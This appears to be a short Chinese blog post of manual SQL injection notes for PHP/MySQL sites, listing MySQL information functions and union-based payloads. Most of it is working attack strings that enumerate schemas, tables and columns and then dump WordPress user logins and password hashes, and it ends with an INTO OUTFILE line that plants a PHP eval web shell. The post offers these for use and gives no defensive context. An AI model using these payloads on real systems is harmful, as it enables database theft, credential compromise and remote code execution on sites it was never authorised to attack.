zoukankan      html  css  js  c++  java
  • php手工注入笔记

    PHP内置函数:
    1:system_user() 系统用户名
    2:user()        用户名
    3:current_user  当前用户名
    4:session_user()连接数据库的用户名
    5:database()    数据库名
    6:version()     MYSQL数据库版本
    7:load_file()   MYSQL读取本地文件的函数
    8:@@datadir     读取数据库路径
    9:@@basedir    MYSQL 安装路径
    10:@@version_compile_os   操作系统  
    ===========================================================================
    爆信息:
    and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--
    ============================================================================
    1,爆库
     and 1=2 union select group_concat(SCHEMA_NAME) from 
     information_schema.SCHEMATA --


    2,爆表
     and 1=2 union select group_concat(TABLE_NAME) from 
     information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--

    3,爆字段
     and 1=2 union select group_concat(COLUMN_NAME) from 
     information_schema.COLUMNS where TABLE_name=0x77705f7573657273--

    4,爆密码
    and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--

    =============================================================================
    load_file()

    select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'
  • 相关阅读:
    图解SSH隧道功能
    su和sudo命令的用法
    Linux下下载百度网盘资料
    WPS Office 2019 for Linux来了
    Linux下的录屏软件Kazam
    用hdparm获取硬盘参数
    百度,你能不能有点节操?
    locate的基本用法
    Java class不分32位和64位
    Web站点抓取工具webhttrack
  • 原文地址:https://www.cnblogs.com/secbook/p/2654865.html
Copyright © 2011-2022 走看看